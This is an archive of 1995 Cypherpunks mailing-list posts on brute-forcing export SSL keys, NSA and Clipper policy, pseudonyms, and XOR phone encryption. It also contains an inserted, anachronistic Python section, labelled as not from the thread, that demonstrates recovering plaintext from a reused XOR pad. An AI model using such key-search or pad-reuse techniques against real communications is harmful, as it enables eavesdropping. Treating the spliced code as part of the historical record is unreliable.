If the YFTLA could diffuse actual source of a method *supposedly* stronger than IDEA and get away with it, could they not equally well get away with planting their man Zimmermann and having him publish PGP with a cunning trapdoor? Let's see, to lend cred to that though they'd probably have to have him arrested on trumped-up charges and generally harassed ... Many people only THINK they know what cynicism means.

Seriously: I've not been round long enough to have a good idea how likely my proposed scenario is. You can all probably tell me things about Z's provenance which blow my little theory sky-high.

cheers,
tim M.
--
"Man is born free, and everywhere he is very reasonable." -- Rousseau (roughly)
Tim Magee, e-mail: Tim at alia1.demon.co.uk, tel: +44-1225-316785

From jsw at neon.netscape.com Sun Sep 3 15:20:24 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Sun, 3 Sep 95 15:20:24 PDT
Subject: A bold ssl idea ?
In-Reply-To: <199509031145.VAA12843@oznet02.ozemail.com.au>
Message-ID: <42d9lh$mjf@tera.mcom.com>

In article <199509031145.VAA12843 at oznet02.ozemail.com.au>, lyalc at ozemail.com.au (lyal collins) writes:
> Having watched the discussions of recent of the SSL bruting, it occurred to
> me that a variation could also be useful.
> I understand that setting up RC4 keys is slower than testing for the correct
> key (I may have misunderstood this bit).
> As a company using SSL can have all its SSL traffic sniffed, from multiple
> people accessing, a log can easily be built of message/keys.
> Is it considered practical to modify the brutessl code to have multiple
> message data, and test each against a key from allocated key space ?
> If so, this may mean that perhaps 3 messages can be tested against a single
> in the time two single keys could be tested against one message.
> As an attack scenario, this is a hell of a lot more "efficient" than current
> trials have been. I realise this could also be considered a bit of target
> for the main purpose of demonstrating weaknesses, and improving techniques.

This technique has been discussed before. It will not work because the 40-bit export version of SSL actually uses 128 bit keys, with 88 of the bits transferred in the clear. The extra 88 bits act as a "salt" to the key. This defeats attempts to do a single key space search for multiple messages.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From rrothenb at ic.sunysb.edu Sun Sep 3 15:41:09 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Sun, 3 Sep 95 15:41:09 PDT
Subject: LR/SHS src (386 ASM)
Message-ID: <199509032235.SAA03213@csws5.ic.sunysb.edu>

I have uploaded a copy of lrsha14.zip to the cypherpunks ftp site. It contains source code for a 32-bit implementation of the Secure Hash Algorithm as well as a Luby-Rackoff/SHA cipher in CFB mode, and a sample Turbo Pascal interface for debugging it, etc.

-Rob

From futplex at pseudonym.com Sun Sep 3 17:35:43 1995
From: futplex at pseudonym.com (Futplex)
Date: Sun, 3 Sep 95 17:35:43 PDT
Subject: Joel's RSA-t's
In-Reply-To:
Message-ID: <9509040035.AA28573@cs.umass.edu>

Mike writes [re: Perl-RSA T-shirts]:
> I just have one problem though...
> If these things are classified
> as a "munition" aka a "weapon" by da fed's how does that affect us down
> here in good old Georgia where our legislature has passed a law making
> it a crime to be in possession of a weapon anywhere within a hundred yards
> or so of school property.

Strong crypto is considered to be a munition *for purposes of U.S. export controls*. With respect to possession within the U.S., there aren't any laws stopping you from waving strong cryptography around wherever you like (at least, not yet).

-Futplex

From vznuri at netcom.com Sun Sep 3 17:55:13 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Sun, 3 Sep 95 17:55:13 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509030434.VAA24841@mycroft.rand.org>
Message-ID: <199509040052.RAA25910@netcom10.netcom.com>

jim at acm.org:
>- By the middle to late 1960's cryptanalysis became less cost effective
> than obtaining the information by other means -- wiretaps and so on.

but for some reason, the NSA keeps humming along...? perhaps confirming the rule that bureaucracies, like bores at parties, persist long after they are relevant?

>In the future there will be more radio used for ordinary communications.
>Americans are unwilling to pay for secure telephones, but that's not the
>case in Europe.

I object to this highly. the NSA has very little credible understanding of market forces, IMHO. they are a government agency. they do not understand marketing or human psychology. Clipper, the closest the agency has come to creeping out of the darkness of their coffin, was a total fiasco. the self-destructing director of NSA whats-his-name who was running for that FBI position or whatever is another example of how the inbred spook society has difficulty dealing with anything outside their artificial reality.

as for the market viability of cryptographic phones, I think this is duplicity ranging on utter lying that "the US public is not willing to pay for secure phones".
this is precisely the baseless rumor and conventional wisdom one would expect the NSA to attempt to spread and use to surreptitiously manipulate the natural market direction. every phone company would avoid even introducing a phone model because "after all the public is not willing to pay for encryption". sure, maybe they won't pay for the very finest encryption money can buy, but they can get some pretty awesome bang for minor bucks when it comes to crypto.

the fact is, cryptography is becoming EXTREMELY CHEAP. virtually all phones are going to have some high power microprocessor inside that could be used to do semi-decent secure encryption, far better than *nothing*, the current status quo-- *for free*, virtually, because the phone is already going to have some serious horsepower. the whole issue of "signal transformation" is very intrinsic to the existing phone circuitry anyway. extremely secure encryption (i.e. that the NSA is not likely to break at all) is another issue, but again chips are becoming awfully cheap.

so I say anyone spreading a rumor that "american public doesn't want encryption or is not willing to pay for it" (esp. in cell phones or whatever) is either:

1. intentionally lying
2. rather clueless
3. making an unwarranted and undemonstrated assumption
4. possibly has an axe to grind-- i.e. axeing widespread public encryption

furthermore, the idea that someone from NSA would say something like "the U.S. public doesn't want so-and-so" encryption I find highly repulsive. the NSA's business is based on SUPPRESSING ENCRYPTION. it would be hard to find a more biased and less credible opinion anywhere. the NSA has done the very best job of sabotaging the natural growth of cyberspace by having its slithering tentacles lodged into key areas of influence within our government, while at the same time pretending that it is actually working in our own best interest.

--

frankly, I think any anti-encryption sentiment is inherently unpatriotic.
you see, there is far more to be gained from widespread encryption than is to be lost from it. the NSA in their anal retentive, freedom-pissing mode will never understand this, or never apprise the situation unbiasedly, but it appears to me to be fairly unequivocal that there are tremendous benefits from the availability of widespread, seamless, invisible encryption.

if the NSA released one public report that analyzed the actual cost benefit ratio to *society* of free encryption, that is the day I will scrape a smidgeon of respect for this vile, odious, noxious excuse for a publicly funded institution. but the NSA will never do this, because (1) the NSA can barely stand to address the congress honestly and openly, and virtually never does even this, and so the idea of justifying its existence to the actual public that pays for its spook toys is beyond distasteful to the agency, it would be sacrilegious!! (2) they are incapable of an unbiased opinion on the issue, in fact they are probably not even capable of any opinion that is not duplicitous and inherently self-serving beneath a surface sugar-coating of actual legitimacy, (3) they don't want to admit that their main motive, their raison d'etre, has absolutely nothing to do with maximizing overall public welfare-- it has to do with maximizing their own budget and maximizing intelligence available to their omnipresent tentacles.

but thanks, JG, for a look into the dark, squirmy, teeming recesses of some perverted spook's mind. I would thoroughly enjoy any other choice morsels you have to offer about the lies that spooks tell each other to justify their existence. and the ones that they actually believe are by far the most entertaining!
--Vlad Nuri

From unicorn at access.digex.net Sun Sep 3 18:19:37 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Sun, 3 Sep 95 18:19:37 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com>
Message-ID:

On Sun, 3 Sep 1995, Vladimir Z. Nuri wrote:

> was a total fiasco. the self-destructing director of NSA whats-his-name
> who was running for that FBI position or whatever is another example of how
> the inbred spook society has difficulty dealing with anything outside
> their artificial reality.

Give this man a prize.

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig!
*New Key Information* - Finger for key revocation and latest key update.

From jirib at sweeney.cs.monash.edu.au Sun Sep 3 18:33:40 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Sun, 3 Sep 95 18:33:40 PDT
Subject: SSL search attacks
In-Reply-To: <9508311728.AA16306@ozymandias.austin.ibm.com>
Message-ID: <199509040132.LAA21977@sweeney.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks at toad.com and Scott Brickner

Scott Brickner writes:
> Jiri Baum writes
...
> >Each client could pick a segment at random, check it and then broadcast
> >a NAK. Other clients would then know that the segment in question has
...
> This only reduces the cost if everyone is playing fair. In practice,
...

No worse than fake NAKs to the central server (viz comment below).

> >One advantage is that it is not necessary to have a central infinitely
> >trusted server. (Nothing personal, but bogus server is an attack.)
>
> An attack on what? The overall model here is that someone presents
...

An attack on the attempt.
If the key owner also volunteers a server, then half the CPU cycles will report to that server (and be given useless chunks of keyspace) thus halving the CPU power available to the usual server ("half" in an infinitely naive world, of course).

The approach I suggested basically corresponds to everyone maintaining hir own server; servers that trust each other will coordinate. An attacker can of course NAK the key segment, but only those that trust the attacker will take any notice.

> My point is that the "random" efforts are no different than everyone
> working on the problem independently, each picking a random place to
> start and going sequentially from there.

The difference is that in this scheme everyone does coordinate, only it's peer-peer rather than client-server.

> >NAKs and IGRABs would be weighted by the trust accorded to the entity
> >that originated them.
>
> This is similar to what I outlined yesterday afternoon. Let unsolicited
...

I think that's where it came from. I really should provide citations, shouldn't I...

...
> Invalid unsolicited NAKs
> don't destroy the current search, they only slow it down slightly ---
> but less than a fully random effort.

Similarly in the peer-peer approach, the effort is coordinated but untrusted NAKs slow it down only slightly. The only "solicited" NAKs will be your own.

Hope that makes sense...

Jiri
- --
If you want an answer, please mail to . On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
-----END PGP SIGNATURE-----

From vznuri at netcom.com Sun Sep 3 18:33:54 1995
From: vznuri at netcom.com (Vladimir Z.
Nuri)
Date: Sun, 3 Sep 95 18:33:54 PDT
Subject: pseudonyms & list health
Message-ID: <199509040131.SAA29509@netcom10.netcom.com>

P.M. remarked in exasperation a little while ago that he thought that some of the best minds had been lost in list attrition due to high traffic, naming some people who had seemingly dropped from the list (Bill Stewart? Phil Karn?)

but what if these people had just stopped subscribing under their clear name? and started using a pseudonym?

this brings to light the idea that credibility is hard won, and that it is hard to get, and that people need all the credibility that they can achieve. it seems that virtually all accomplishments are credibility-enhancing, and people only "notch down" their reputation estimations in extreme circumstances.

hence, what I am suggesting is that one of the "stable attractors" that TM is always talking about may be a reality in which people pool most of their accomplishments under a single nym. furthermore, they will wish to avoid conflict with other nyms in respect to attribution.

isn't this, functionally, the equivalent of the supposed anti-cypherpunk "true names"?

now, I'm not suggesting that "if you want to do something in secret, you must have something to hide". (although that seems almost like a tautology to me). but what I am suggesting, is that if you want to get credit, it may pay to pool all your accomplishments under one nym (tracing it to a physical body is a whole separate issue-- the two should not be confused; although the concept of "true names" does tend to blur this distinction).

in the case of PM, he thought that because some people ostensibly dropped from the list, the list quality had decreased. but he seemed to be making this conclusion based on their "real identity". what if they were still around, posting under pseudonyms? would he be able to tell? would the signal quality be the same?
the point is that people seem to judge list quality based on criteria in which "true names" play a major role. I'm not saying this is the only way to do it, but I am saying that "true names" seem to be very much ingrained into human psychology, particularly in public forums and attributing credit, and the idea that they are wholly irrelevant to most human endeavor is very suspicious, at least deserving more than a few paragraphs of supposed proof.

--

another problem with pseudonyms and list noise is the following. first, let me start by saying I think this list approaches the "dysfunctional" level at times when everyone is ranting about each other about staying on topic. there is an awful lot of hostility on this list. maybe people like it, I'm not sure. I'm interested in the sources of this hostility, though, and I think I can identify some good candidates.

the list hostility and tension is quite palpable. when TM prefaces many of his posts, and many others do, with frequent apologies about being on topic, I am amazed to see this because I don't see people so self-conscious on other mailing lists.

in my opinion, this is where the role of the moderator is absolutely critical. any mailing list with an AWOL moderator is only asking for total chaos, IMHO. in this case I'll use the word "moderator" and "list creator" interchangeably.

the best recommendation to everyone who subscribes to the list, and to the moderator, is that THE MODERATOR DETERMINES WHAT IS RELEVANT. that means that no one else has the authority to do this, NO ONE. if you find a post that bothers you, FIRST WRITE THE LIST MODERATOR. ask the LIST MODERATOR to deal with the offending poster.

the list moderator should make a judgement when the list is in a "noise" phase and try to be clear about what is relevant to the list and what is not. what this requires is a watchful eye and regular interventions, IMHO.
a list where the moderator is never around may seem like a haven, but in my opinion it only turns into a grouch free-for-all subject to regular conflagrations that leave everyone *really* pissed off, as did a recent eruption by TM and PM.

now, whenever you see someone write, THIS ISN'T RELEVANT TO THIS LIST!! THIS DOESN'T HAVE ANYTHING TO DO WITH CRYPTO!! IMHO you should gently remind this person in email that THEIR OPINION OF WHAT IS RELEVANT OR NOT IS NOT RELEVANT. tell them to write the list moderator first, IN EMAIL. jamming up the communication medium with meta traffic about what is and is not relevant is absolutely futile and useless and counterproductive and extremely anxiety producing. so, as you can see, IMHO people who are continually making judgements about what is or is not relevant to the list, and posting those opinions, are PART OF THE PROBLEM. (I am reminded of one himself talking about people who are part of the problem and who is part of the solution. well, IMHO, ironically, he is PART OF THE PROBLEM, and for a very obvious and clear reason that even an intelligent child could grasp).

--

the Yin to the Yang of all this, however, is that the LIST MODERATOR MUST OCCASIONALLY SHOW HIS FACE and make unambiguous rulings about what is and what is not appropriate, especially when the noise level increases and people start to wonder. the problem with this is a list moderator who likes to use one or two pseudonyms. the pseudonyms may be so secret that not *anyone* on the list is aware of his identity, even close friends. this list moderator may be loath to ever post under his "true name" or whatever name he used to start the list.

anyway, you can see that this whole business of pseudonyms, while perhaps workable, is certainly fraught with pitfalls IMHO. at least in situations of *public forums*, I am going to go out on a limb and say that it is very troublesome.
it seems that in any forum, there are people who will try to disrupt the proceedings, so to speak. in real life you can throw them out, by identifying their *picture*. in a cyberspace that lacks true identities, you cannot throw out these "problem people". they continually come back to haunt you despite your best attempts to bar them. doesn't that bug you? doesn't that irritate you? doesn't that drive you crazy? or do you like the idea that the person you most hate in life might be posting behind any of the next few messages? and there's nothing you can do about it? because you in fact embrace the capabilities that let him do this, and you're pretty sure you're not a hypocrite? well, just some musings for those who unabashedly promote pseudonyms to contemplate.

p.s. in regard to the above, about "people other than the moderator posting judgements about what is and is not relevant to the list", I am not making a judgement about what is and is not relevant on the list. I am making a judgement about making a judgement about what is and what is not relevant on the list.

--Vlad Nuri

From jim at acm.org Sun Sep 3 18:40:08 1995
From: jim at acm.org (Jim Gillogly)
Date: Sun, 3 Sep 95 18:40:08 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com>
Message-ID: <199509040139.SAA26859@mycroft.rand.org>

> jim at acm.org (reporting on R. H. Morris' talk at Crypto '95):
> >- By the middle to late 1960's cryptanalysis became less cost effective
> > than obtaining the information by other means -- wiretaps and so on.

> "Vladimir Z. Nuri" writes:
> but for some reason, the NSA keeps humming along...? perhaps
> confirming the rule that bureaucracies, like bores at parties,
> persist long after they are relevant?

Evidently they have plenty of other sources to deal with... their SIGINT charter is to read traffic, not necessarily to decrypt traffic.
It does seem excessive, though, and it will seem even more excessive once more traffic is encrypted with strong systems and plaintext begins to disappear from the airwaves and wires. It bothers me that the gov't appears to be redefining the role of the intelligence community to be economic spying rather than the military spying that was (I think) justified during the Cold War. Rather than finding ways to justify and maintain current budgets and bureaucracies, why not just cough up the peace dividend?

> >In the future there will be more radio used for ordinary communications.
> >Americans are unwilling to pay for secure telephones, but that's not the
> >case in Europe.

> I object to this highly. the NSA has very little credible understanding
> of market forces, IMHO. they are a government agency. they do not ...
> as for the market viability of cryptographic phones, I think this
> is duplicity ranging on utter lying that "the US public is not
> willing to pay for secure phones". this is precisely the baseless

I misstated his point to some extent here. He was contrasting current buying practices in the U.S. and in Europe, not predicting the future (i.e. not exactly what I said above). In particular, he mentioned GSM in Europe and its success... of course, that doesn't count as strong encryption with the keys evidently being no better than 40 bits worth, but it's a lot better than calling in the clear from your cellular phone. He indicated that Europe has embraced GSM and the US has not (yet) embraced anything equivalent (about which more below).

> Clipper, the closest the
> agency has come to creeping out of the darkness of their coffin,
> was a total fiasco.

Clipper wasn't a fiasco from the gov't's point of view if you look at what it prevented rather than what it achieved. By now the DES-based AT&T encryption box might be the US standard if the Gov't hadn't intervened by "incentivizing" them around the time of the Clipper roll-out.
It was ready to go and was already in production when Clipper got rushed up. As it is there is now no standard and most traffic is still in clear. If this doesn't reflect a credible understanding of how the market works, what would? Of course this one can't completely be laid at NSA's door, but it's convenient to think of them as the fount of US crypto policy decisions.

> you see, there is far more to be gained from widespread
> encryption than is to be lost from it.

Agreed.

Jim Gillogly
Trewesday, 13 Halimath S.R. 1995, 01:26

From vznuri at netcom.com Sun Sep 3 18:52:47 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Sun, 3 Sep 95 18:52:47 PDT
Subject: maximizing cryptographic return
Message-ID: <199509040149.SAA01359@netcom10.netcom.com>

the question of the cost-effectiveness of phone encryption was raised by my other message. I would like to question how cheaply good encryption could be done on phones, with a poor quality microprocessor.

most on this list are aware of the idea that good encryption is often used to send a low-bandwidth session key, which is then used to encrypt that session using a less sophisticated but less computationally-demanding algorithm. hence you seem to have good security at a computational price that is less than encrypting everything with the secure protocol.

I was wondering how secure the following algorithm would be for phone calls: suppose that at the beginning of each session, the random key is traded using RSA or some other very secure approach. the key is a *random bit width*, say 100-6000 bits. now, my question is, I wonder if some very cheap algorithms, in terms of computation time, could be used for the "on the fly" encryption of the voice using those bits. would XOR with the pad be totally out of line?

the situation is such that trivial algorithms such as XOR with *unlimited cyphertext* can be broken quite trivially.
but it seems to me this dogma that "XOR is WEAK" is based on the premise that you have a huge amount of cyphertext to play with. take away this premise, that you have a session key that is guaranteed to really give you very little cyphertext, do these supposedly "weak" algorithms then become pretty secure?

what I am getting at is that it seems there is this frequent assumption that "good cryptography for on-the-fly encryption means you need huge computational bandwidth". I wonder how true this really is. can you have a situation where you spend a lot of time computationally negotiating the *random one time pad*, but then have a fairly weak algorithm doing the on-the-fly encryption with the random pad? IMHO this would be the holy grail for phone hardware. as I wrote, you are already going to have something approximating the power of a low-bandwidth microprocessor in a phone. now imagine it took a long time to send the key at the beginning, but that once traded it was no big deal-- real time communication using even "weak" algorithms.

what I am suggesting here is that we can get encryption for almost *no additional cost* over existing phone hardware. and I am suggesting that the main hurdles to encryption are political, not technical. again, I wonder if "weak" encryption schemes are really that weak if they are only used on short cyphertexts and if you have a good, secure OTP (one time pad). I think it may be a delusion that you must have a huge amount of computational bandwidth or have to encrypt every bit using state-of-the-art, computationally-demanding algorithms to have extremely secure on-the-fly communications.

p.s. can someone give a brief summary of the Nautilus and PGP session key / code frameworks?

p.p.s. a few footnotes in regard to the previous article. widespread, seamless phone encryption is the NSA's absolute worst nightmare. everything they are doing to prevent cryptography can be thought of as trying to avoid this particular reality configuration.
pay special attention to how they approach the issue and it will tell you what they fear the most, and what they are trying to do to prevent it.

also, Bob Morris said in his talk, acc. to Gillogly, that Europeans *were* willing to pay for encryption in their phones, but those in the US weren't. please expand on that little nugget!! how did you come to that conclusion? why are americans fundamentally different from europeans in regard to the value of encryption? if humans want the same thing in most markets (as the situation of international product marketing generally seems to suggest) does it make you think that something besides the desirability of crypto is at stake here in the localities, such as *politics*?

--Vlad Nuri

From alanh at infi.net Sun Sep 3 19:03:26 1995
From: alanh at infi.net (Alan Horowitz)
Date: Sun, 3 Sep 95 19:03:26 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040139.SAA26859@mycroft.rand.org>
Message-ID:

"Just cough up the peace dividend".

There is no peace dividend. There is a massive eco-spill of government debt; quite possibly larger than the GNP capacity of the American economy to repay anytime in the next century. The debt will be bankrupted, in some stealthy manner, hidden by masses of smoke and mirrors. Nothing new here - it's about the only thing that works. For the most recent examples, read up on FDR's confiscation of gold in (?) 1933. Or read the details of the currency changeover effected by the occupation authorities in Germany (1947 or 1948).

Alan Horowitz
alanh at infi.net

From vznuri at netcom.com Sun Sep 3 19:15:32 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Sun, 3 Sep 95 19:15:32 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040139.SAA26859@mycroft.rand.org>
Message-ID: <199509040212.TAA03591@netcom10.netcom.com>

JG:
>Rather than finding ways to justify and maintain current budgets
>and bureaucracies, why not just cough up the peace dividend?
taking money from a bureaucracy is like the exact opposite of taking candy from a baby. but hell, maybe you could get a job as a spook in their dark tunnels and "show them the light" so to speak.

>I misstated his point to some extent here.

oh right, any perceived boneheadedness on the part of a premier spook is surely in the eye of the beholder

> He indicated
>that Europe has embraced GSM and the US has not (yet) embraced anything
>equivalent (about which more below).

well, thanks for clearing up the assertion but I stand by my rant. (and BTW, thank you for the wonderful opportunity, one must prize every opportunity to get one's blood boiling to know one is alive). the US may very well not have "embraced" any encryption standard because the NSA is trying to THROW A @#$%^&* WRENCH INTO ANY STANDARD THAT IS DEVELOPED. that is EXACTLY WHAT CLIPPER WAS AN ATTEMPT TO DO. y'know that we MAY HAVE WIDESPREAD ENCRYPTION BY NOW if the NSA had not continually interfered with what is normally a NATURAL PROCESS of standards creation in the technological community. Clipper is a black, black mark not only because of what it tried to *introduce*, but also because of what it tried to *replace*.

again, the fact that we do not have widespread encryption in the U.S. acc. to the NSA reminds me of the anecdote of the murderer going before the court and stating that he deserved leniency because he was an orphan. THE NSA HAS TRIED TO MURDER CRYPTO IN THE U.S. and then say, "gosh!! there's no crypto!! no one has it!! therefore, no one wants it!! why is everyone so angry when we tried to keep it from everyone when nobody wants it"? @#$%^&*!!!

again, I suggest that the lack of crypto in the US is due to a *political* situation, and nothing else.
the NSA of course would like to deny that, and justify the *political* situation based on something else (such as that people don't really want encryption or that it is not really in the nation's best interests)

>Clipper wasn't a fiasco from the gov't's point of view if you look at what
>it prevented rather than what it achieved. By now the DES-based AT&T
>encryption box might be the US standard if the Gov't hadn't intervened by
>"incentivizing" them around the time of the Clipper roll-out.

exactly. THE MARKET COULD HAVE BEEN MATURING LONG AGO INSTEAD OF THROWN INTO CONFUSION. we could have been on the path to improving encryption capability. and Clipper is only the product that we *saw* in front of the world. did anything in the Clipper announcement talk about the government collusion with AT&T? it is patently obvious that the NSA has long worked behind the scenes to try to sabotage crypto, and that Clipper was only the most desperate instance that we *heard* about.

of course, when there is widespread crypto the NSA will probably try to justify its existence based on the widespread crypto in the world, and take credit for its introduction. "why, after all, Clipper was a major step in introducing good encryption to the masses". @#$%^&*

> It was
>ready to go and was already in production when Clipper got rushed up. As
>it is there is now no standard and most traffic is still in clear.

indeed!! true progress!! the government has accomplished its mission of sabotaging privacy!! so Clipper is a tremendous success in sowing fear of the NSA into every American!! in throwing the standards process into total confusion!!

JG, let me ask you a question. imagine there was some foreign government agency, say of a totalitarian government, that wanted to prevent the "spread of cyberspace" around the world. don't you think they could be quite effective in killing the Internet as it was growing?
it would be quite trivial to insert agents provocateurs into all the open standards-making Internet conventions. where would we be now if this happened? cryptography is very intrinsic to cyberspace, and it would be quite ubiquitous now if it weren't for the reprehensible covert and overt NSA wrench-throwing acts. the NSA is sabotaging the natural growth of cyberspace, unequivocally. I hope that every person in the NSA who reads about Netscape or uses it, the Web, or the Internet, hangs his/her head in shame, that he worked in an agency that helped work *against* the reality that created these wonderful embodiments of freedom in communication.

>> you see, there is far more to be gained from widespread
>> encryption than is to be lost from it.
>
>Agreed.

actually, to tell you the truth I don't consider that a given. it is very well possible that a huge advantage shifts to the terrorists of the world. it very well may be!! but is anyone actually trying to unbiasedly *answer* this question with honest research? of course not. the NSA, the FBI, the whole law enforcement community is in total CYA mode. we have Freeh actually utter at a press conference, "would you feel the same about strong encryption if your daughter was kidnapped by a pedophile?" or whatever his little @#$%^^&* phrase was....anybody remember that slimy epithet of his?

for god's sake, could someone in the government do a study of what would *actually happen* if there was widespread encryption, instead of letting the NSA's apparent default idea of "apocalypse now!!!" rule the whole debate?? the NSA is always talking about "the right to communication balanced with the needs of law enforcement", but have they ever determined what in fact the costs are to society at large? beyond simply ASSUMING that if a policeman complains that he can't tap a phone line, that the world is really going to end tomorrow?!?!
has it ever occurred to law enforcement agencies that widespread encryption may actually make their lives *easier*?? I could see a situation where this is possible. the police routinely say, "sorry ma'am we can't do anything because our hands are tied". if the police and our government were prevented from any intervention into any area involving cyberspace, perhaps both society and the police would breathe a lot easier!!

--Vlad Nuri

From p.v.mcmahon.rea0803 at oasis.icl.co.uk Sun Sep 3 19:36:17 1995
From: p.v.mcmahon.rea0803 at oasis.icl.co.uk (p.v.mcmahon.rea0803 at oasis.icl.co.uk)
Date: Sun, 3 Sep 95 19:36:17 PDT
Subject: European willingness to pay ...
Message-ID: <199509040220.24023.0@getafix>

> also, Bob Morris said in his talk, acc. to Gillogly, that Europeans
> *were* willing to pay for encryption in their phones, but those in the
> US weren't. please expand on that little nugget!! how did you come

Presumably this is a reference to GSM.

- pvm

From patrick at Verity.COM Sun Sep 3 19:42:08 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Sun, 3 Sep 95 19:42:08 PDT
Subject: Crypto '95: Robert Morris
Message-ID: <9509040238.AA04342@cantina.verity.com>

> So Robert Morris worked for NSA.
> Does that mean that the infamous 1988 Internet Worm
> was part of a NSA-sponsored intelligence-gathering mission?
>

No, that was his kid! Imagine his chagrin!

Patrick

 _______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;).   \
| Patrick J. Horgan      Verity Inc.                        Have        |
| patrick at verity.com  1550 Plymouth Street                Sword      |
| Phone : (415)960-7600  Mountain View                      Will        |
| FAX   : (415)960-7750  California 94303                   Travel      |
\_______________________________________________________________________/

From sinclai at ecf.toronto.edu Sun Sep 3 20:16:35 1995
From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N)
Date: Sun, 3 Sep 95 20:16:35 PDT
Subject: maximizing cryptographic return
In-Reply-To: <199509040149.SAA01359@netcom10.netcom.com>
Message-ID: <95Sep3.231607edt.994@cannon.ecf.toronto.edu>

> I was wondering how secure the following algorithm would be for phone
> calls: suppose that at the beginning of each session, the random
> key is traded using RSA or some other very secure approach. the
> key is a *random bit width*, say 100-6000 bits. now, my question is,
> I wonder if some very cheap algorithms, in terms of computation time,
> could be used for the "on the fly" encryption of the voice using those
> bit. would XOR with the pad be totally out of line?
>
> the situation is such that trivial algorithms such as XOR with *unlimited
> cyphertext* can be broken quite trivially. but it seems to me this
> dogma that "XOR is WEAK" is based on the premise that you have a huge
> amount of cyphertext to play with. take away this premise, that you
> have a session key that is guaranteed to really give you very little
> cyphertext, do these supposedly "weak" algorithms then become pretty
> secure?

No, XOR is weak if used even twice. If you XOR the two pieces of cyphertext with each other, you get the two plaintexts XORed. I'd be willing to bet that the human ear can understand two audio signals XORed. Certainly with practice people can understand audio that has been encrypted with frequency inversion. Pre-encryption compression would solve this, but XOR is still very weak.
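The weakness Sinclair describes, worked through as an added example (not code from the thread): a 100-6000 bit pad XORed over a voice stream is exhausted within a second and must be reused, and once it is reused the pad cancels out of any two ciphertext stretches. The pad, sample "call" bytes, function names and the 8 kbit/s stream rate are all constructed for the demonstration.

```python
# Added example: why "XOR with the exchanged random key" fails as soon as
# the key is used twice, even though the key itself was exchanged securely.
# Everything here (pad, sample frames, bitrate, function names) is
# constructed for the demo and is not the thread's own code.


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("inputs must be the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def pad_encrypt(pad: bytes, data: bytes) -> bytes:
    """The proposed scheme: XOR the stream with the session pad, cycling the
    pad once it runs out. Decryption is the identical operation."""
    if not pad:
        raise ValueError("empty pad")
    return bytes(d ^ pad[i % len(pad)] for i, d in enumerate(data))


def pad_lifetime_seconds(pad_bits: int, stream_bps: int) -> float:
    """Seconds of stream a pad covers before it has to be reused.
    (8000 bit/s below is an assumed voice-codec rate, not a figure from the
    thread; at that rate even the 6000-bit upper end lasts 0.75 s.)"""
    return pad_bits / stream_bps


def cross_stream_leak(c1: bytes, c2: bytes) -> bytes:
    """Two ciphertexts under the same pad: c1 ^ c2 == p1 ^ p2.
    The pad cancels, so no knowledge of it is needed to get this far."""
    n = min(len(c1), len(c2))
    return xor_bytes(c1[:n], c2[:n])


def recover_with_known_plaintext(c1: bytes, c2: bytes, p1: bytes) -> bytes:
    """If one of the two plaintexts is known (a silence frame, a fixed
    greeting), the other falls straight out of the leak."""
    leak = cross_stream_leak(c1, c2)
    return xor_bytes(leak, p1[:len(leak)])


def intra_stream_leak(c: bytes, pad_len: int) -> bytes:
    """Within a single stream the cycled pad makes byte i and byte i+pad_len
    share a key byte, so c[i] ^ c[i+pad_len] == p[i] ^ p[i+pad_len]:
    one long call is already its own "second ciphertext"."""
    return bytes(c[i] ^ c[i + pad_len] for i in range(len(c) - pad_len))


if __name__ == "__main__":
    import os
    pad = os.urandom(16)                         # constructed 128-bit "session pad"
    call_a = b"hello, this is call one, over"    # constructed stand-ins for voice frames
    call_b = b"hello, this is call two, over"
    c_a, c_b = pad_encrypt(pad, call_a), pad_encrypt(pad, call_b)
    assert cross_stream_leak(c_a, c_b) == xor_bytes(call_a, call_b)
    assert recover_with_known_plaintext(c_a, c_b, call_a) == call_b
    print("pad lasts %.2f s before reuse" % pad_lifetime_seconds(6000, 8000))
    # The remedy is not a longer pad but a real cipher keyed by the session
    # key, whose keystream never repeats within a session; PGP, for one,
    # uses its RSA-exchanged session key to key a conventional cipher
    # rather than as a pad.
```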
From cme at clark.net Sun Sep 3 20:38:22 1995
From: cme at clark.net (Carl Ellison)
Date: Sun, 3 Sep 95 20:38:22 PDT
Subject: rump session papers
Message-ID: <199509040337.XAA15787@clark.net>

I ran out of copies of my rump session paper handouts. So, I put them on my ftp server...

ftp://ftp.clark.net/pub/cme/ps/

cepp.ps :: a couple of symmetric modes for block ciphers which I threw out for people to attack....

k1.ps :: Key exchange algorithm K-1 -- with some very suggestive properties. Whit Diffie titled this one "If S-1 is Skipjack, then K-1 is KEA" in the rump session list. I'm not about to make that claim -- but it *does* have some interesting characteristics.

Enjoy,

Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison  cme at acm.org  http://www.clark.net/pub/cme/home.html   |
